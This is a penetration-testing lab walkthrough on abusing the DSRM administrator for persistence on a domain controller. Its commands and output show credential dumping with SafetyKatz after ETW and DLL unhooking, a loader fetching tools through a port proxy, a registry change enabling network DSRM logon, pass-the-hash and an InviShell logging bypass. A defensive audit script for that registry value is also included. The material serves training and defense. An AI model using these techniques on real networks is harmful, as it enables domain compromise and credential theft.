crtp-11

Learning Object 11

Tasks

1 – Use Domain Admin privileges obtained earlier to abuse the DSRM credential for persistence

Flag 20 [dcorp-dc] – Name of the Registry key modified to change Logon behavior of DSRM administrator 🚩

Solutions
1 – Use Domain Admin privileges obtained earlier to abuse the DSRM credential for persistence

To set up persistence with administrative access to the DC by abusing the DSRM administrator, we first need Domain Admin privileges. Obtain them with the svcadmin key as in the earlier exercises:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

As usual, in the newly spawned shell, run the following commands to copy Loader.exe to the DC and extract credentials from the SAM hive (local users):

echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-dc\C$\Users\Public\Loader.exe /Y
winrs -r:dcorp-dc cmd
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.98
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -args "token::elevate" "lsadump::evasive-sam" "exit"


Microsoft Windows [Version 10.0.20348.2762]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-dc\C$\Users\Public\Loader.exe /Y
C:\AD\Tools\Loader.exe
1 File(s) copied

C:\Windows\system32>winrs -r:dcorp-dc cmd
Microsoft Windows [Version 10.0.20348.2762]
(c) Microsoft Corporation. All rights reserved.

C:\Users\svcadmin>netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.98
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.98


C:\Users\svcadmin>C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -args "token::elevate" "lsadump::evasive-sam" "exit"
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -args "token::elevate" "lsadump::evasive-sam" "exit"
[+] Successfully unhooked ETW!
[+++] NTDLL.DLL IS UNHOOKED!
[+++] KERNEL32.DLL IS UNHOOKED!
[+++] KERNELBASE.DLL IS UNHOOKED!
[+++] ADVAPI32.DLL IS UNHOOKED!
[+] URL/PATH : http://127.0.0.1:8080/SafetyKatz.exe Arguments : token::elevate lsadump::evasive-sam exit

  .#####.   mimikatz 2.2.0 (x64) #19041 Nov  5 2024 21:52:02
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # token::elevate
Token Id  : 0
User name :
SID name  : NT AUTHORITY\SYSTEM

616     {0;000003e7} 1 D 20261          NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Primary
 -> Impersonated !
 * Process Token : {0;042bf404} 0 D 70059994    dcorp\svcadmin  S-1-5-21-719815819-3726368948-3917688648-1118   (12g,26p)       Primary
 * Thread Token  : {0;000003e7} 1 D 70110579    NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Impersonation (Delegation)

mimikatz(commandline) # lsadump::evasive-sam
Domain : DCORP-DC
SysKey : bab78acd91795c983aef0534e0db38c7
Local SID : S-1-5-21-627273635-3076012327-2140009870

SAMKey : f3a9473cb084668dcf1d7e5f47562659

RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: a102ad5753f4c441e3af31c97fad86fd

RID  : 000001f5 (501)
User : Guest

RID  : 000001f7 (503)
User : DefaultAccount

RID  : 000001f8 (504)
User : WDAGUtilityAccount

mimikatz(commandline) # exit
Bye!

C:\Users\svcadmin>


Compare this Administrator hash with the Administrator hash returned by the command below:

SafetyKatz.exe -args "token::elevate" "lsadump::evasive-lsa /patch" "exit"
mimikatz(commandline) # lsadump::evasive-lsa /patch
Domain : dcorp / S-1-5-21-719815819-3726368948-3917688648

RID  : 000001f4 (500)
User : Administrator
LM   :
NTLM : af0686cc0ca8f04df42210c9ac980760
The hash is different: this one belongs to the domain Administrator, not to the DSRM administrator.

The DSRM administrator is not allowed to log on to the DC over the network, so we need to change the logon behavior for the account by modifying the registry on the DC. We can do this as follows:

reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v "DsrmAdminLogonBehavior" /t REG_DWORD /d 2 /f
C:\Users\svcadmin>reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v "DsrmAdminLogonBehavior" /t REG_DWORD /d 2 /f
reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v "DsrmAdminLogonBehavior" /t REG_DWORD /d 2 /f
The operation completed successfully.

C:\Users\svcadmin>
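The registry value changed above is exactly what a defender should be watching. The script below is an added audit example, not part of the lab material or any of the tools used here: it reads DsrmAdminLogonBehavior from every domain controller and reports anything other than the default, and it pulls Security Event ID 4657 (registry value modified) entries that touched that value name. It assumes the ActiveDirectory RSAT module is installed, that the caller has WinRM access to the DCs, and that "Audit Registry" plus a SACL on the Lsa key are enabled on the DCs (4657 is not generated otherwise). The value meanings (0 or absent, 1, 2) are Microsoft's documented semantics; the function names are the script's own.

```powershell
# Added audit script (not part of the lab material): checks every domain
# controller for the DsrmAdminLogonBehavior value and pulls any
# registry-modification events (Security Event ID 4657) that touched it.
# Assumes: ActiveDirectory RSAT module, WinRM access to the DCs, and
# "Audit Registry" + a SACL on the Lsa key enabled on the DCs.
#Requires -Modules ActiveDirectory

$LsaKey    = 'HKLM:\System\CurrentControlSet\Control\Lsa'
$ValueName = 'DsrmAdminLogonBehavior'

# Documented meanings of the value (absent or 0 is the secure default).
$Meaning = @{
    0 = 'DSRM admin can log on only when the DC is booted into DSRM (default)'
    1 = 'DSRM admin can log on when the AD DS service is stopped'
    2 = 'DSRM admin can always log on, including over the network (suspicious)'
}

function Get-DsrmLogonBehavior {
    param([string[]]$ComputerName)

    Invoke-Command -ComputerName $ComputerName -ScriptBlock {
        param($Key, $Name)
        $raw = (Get-ItemProperty -Path $Key -Name $Name -ErrorAction SilentlyContinue).$Name
        # A missing value behaves like 0, but record whether it was present at all.
        $val = if ($null -eq $raw) { 0 } else { [int]$raw }
        [pscustomobject]@{
            ComputerName = $env:COMPUTERNAME
            Value        = $val
            Present      = ($null -ne $raw)
        }
    } -ArgumentList $LsaKey, $ValueName
}

function Get-DsrmRegistryChangeEvents {
    param([string[]]$ComputerName, [int]$Days = 30)

    Invoke-Command -ComputerName $ComputerName -ScriptBlock {
        param($Name, $Days)
        $filter = @{ LogName = 'Security'; Id = 4657; StartTime = (Get-Date).AddDays(-$Days) }
        Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
            # Flatten the EventData <Data Name="..."> nodes into a lookup table.
            $xml  = [xml]$_.ToXml()
            $data = @{}
            foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
            if ($data['ObjectValueName'] -eq $Name) {
                [pscustomobject]@{
                    ComputerName = $env:COMPUTERNAME
                    TimeCreated  = $_.TimeCreated
                    Subject      = "$($data['SubjectDomainName'])\$($data['SubjectUserName'])"
                    Process      = $data['ProcessName']
                    OldValue     = $data['OldValue']
                    NewValue     = $data['NewValue']
                }
            }
        }
    } -ArgumentList $ValueName, $Days
}

$dcs = (Get-ADDomainController -Filter *).HostName

# Current state: anything other than 0 deserves an investigation.
Get-DsrmLogonBehavior -ComputerName $dcs | ForEach-Object {
    $flag = if ($_.Value -ne 0) { 'ALERT' } else { 'ok' }
    '{0,-6} {1,-20} {2} -> {3}' -f $flag, $_.ComputerName, $_.Value, $Meaning[$_.Value]
}

# History: who changed the value, from which process, and from what to what.
Get-DsrmRegistryChangeEvents -ComputerName $dcs | Format-Table -AutoSize
```

Run it from a workstation with RSAT as an account that can remote to the DCs. A DC reporting 2 with a 4657 entry showing reg.exe run under a Domain Admin account, as in the walkthrough above, is the pattern worth alerting on; resetting the value to 0 and rotating the DSRM password on that DC closes the persistence.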

Now, on the student VM, from a high-integrity cmd shell, we can use Pass-The-Hash (not OverPass-The-Hash) for the DSRM administrator:

C:\AD\Tools\Loader.exe -Path C:\AD\Tools\SafetyKatz.exe "sekurlsa::evasive-pth /domain:dcorp-dc /user:Administrator /ntlm:a102ad5753f4c441e3af31c97fad86fd /run:cmd.exe" "exit"

From the new process, we can now access dcorp-dc. In this case we use PowerShell Remoting with the IP address and -Authentication 'NegotiateWithImplicitCredential', because we are relying on NTLM authentication. It is therefore necessary to add the DC to TrustedHosts on the student VM by running the command below from an elevated PowerShell session:

Set-Item WSMan:\localhost\Client\TrustedHosts 172.16.2.1

Now, run the commands below to access the DC:

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

Enter-PSSession -ComputerName 172.16.2.1 -Authentication NegotiateWithImplicitCredential

$env:username
c:\Users\student98>C:\AD\Tools\Loader.exe -Path C:\AD\Tools\SafetyKatz.exe "sekurlsa::evasive-pth /domain:dcorp-dc /user:Administrator /ntlm:a102ad5753f4c441e3af31c97fad86fd /run:cmd.exe" "exit"
[+] Successfully unhooked ETW!
[+++] NTDLL.DLL IS UNHOOKED!
[+++] KERNEL32.DLL IS UNHOOKED!
[+++] KERNELBASE.DLL IS UNHOOKED!
[+++] ADVAPI32.DLL IS UNHOOKED!
[+] URL/PATH : C:\AD\Tools\SafetyKatz.exe Arguments :

  .#####.   mimikatz 2.2.0 (x64) #19041 Nov  5 2024 21:52:02
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # sekurlsa::evasive-pth /domain:dcorp-dc /user:Administrator /ntlm:a102ad5753f4c441e3af31c97fad86fd /run:cmd.exe
user    : Administrator
domain  : dcorp-dc
program : cmd.exe
impers. : no
NTLM    : a102ad5753f4c441e3af31c97fad86fd
  |  PID  8812
  |  TID  8832
  |  LSA Process is now R/W
  |  LUID 0 ; 366768920 (00000000:15dc7318)
  \_ msv1_0   - data copy @ 0000026BDA6ED640 : OK !
  \_ kerberos - data copy @ 0000026BDB06E798
   \_ aes256_hmac       -> null
   \_ aes128_hmac       -> null
   \_ rc4_hmac_nt       OK
   \_ rc4_hmac_old      OK
   \_ rc4_md4           OK
   \_ rc4_hmac_nt_exp   OK
   \_ rc4_hmac_old_exp  OK
   \_ *Password replace @ 0000026BDB062A98 (32) -> null

mimikatz(commandline) # exit
Bye!

c:\Users\student98>


From the spawned process (Administrator: C:\WINDOWS\SYSTEM32\cmd.exe), then powershell:
Microsoft Windows [Version 10.0.20348.2762]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>Set-Item WSMan:\localhost\Client\TrustedHosts 172.16.2.1
'Set-Item' is not recognized as an internal or external command,
operable program or batch file.

C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> Set-Item WSMan:\localhost\Client\TrustedHosts 172.16.2.1

WinRM Security Configuration.
This command modifies the TrustedHosts list for the WinRM client. The computers in the TrustedHosts list might not be
authenticated. The client might send credential information to these computers. Are you sure that you want to modify
this list?
[Y] Yes  [N] No  [S] Suspend  [?] Help (default is "Y"): Y
PS C:\Windows\system32> C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

C:\Windows\system32>set COR_ENABLE_PROFILING=1

C:\Windows\system32>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Windows\system32>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}" /f
The operation completed successfully.

C:\Windows\system32>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}\InprocServer32" /f
The operation completed successfully.

C:\Windows\system32>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}\InprocServer32" /ve /t REG_SZ /d "C:\AD\Tools\InviShell\InShellProf.dll" /f
The operation completed successfully.

C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> Enter-PSSession -ComputerName 172.16.2.1 -Authentication NegotiateWithImplicitCredential
[172.16.2.1]: PS C:\Users\Administrator.DCORP-DC\Documents> $env:username
Administrator
[172.16.2.1]: PS C:\Users\Administrator.DCORP-DC\Documents> $env:computername
DCORP-DC
[172.16.2.1]: PS C:\Users\Administrator.DCORP-DC\Documents>


Flag 20 [dcorp-dc] – Name of the Registry key modified to change Logon behavior of DSRM administrator 🚩

reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v "DsrmAdminLogonBehavior" /t REG_DWORD /d 2 /f

Based on the last command, the registry key modified to change the logon behavior of the DSRM administrator is: XXXXXXXXXXXBehavior.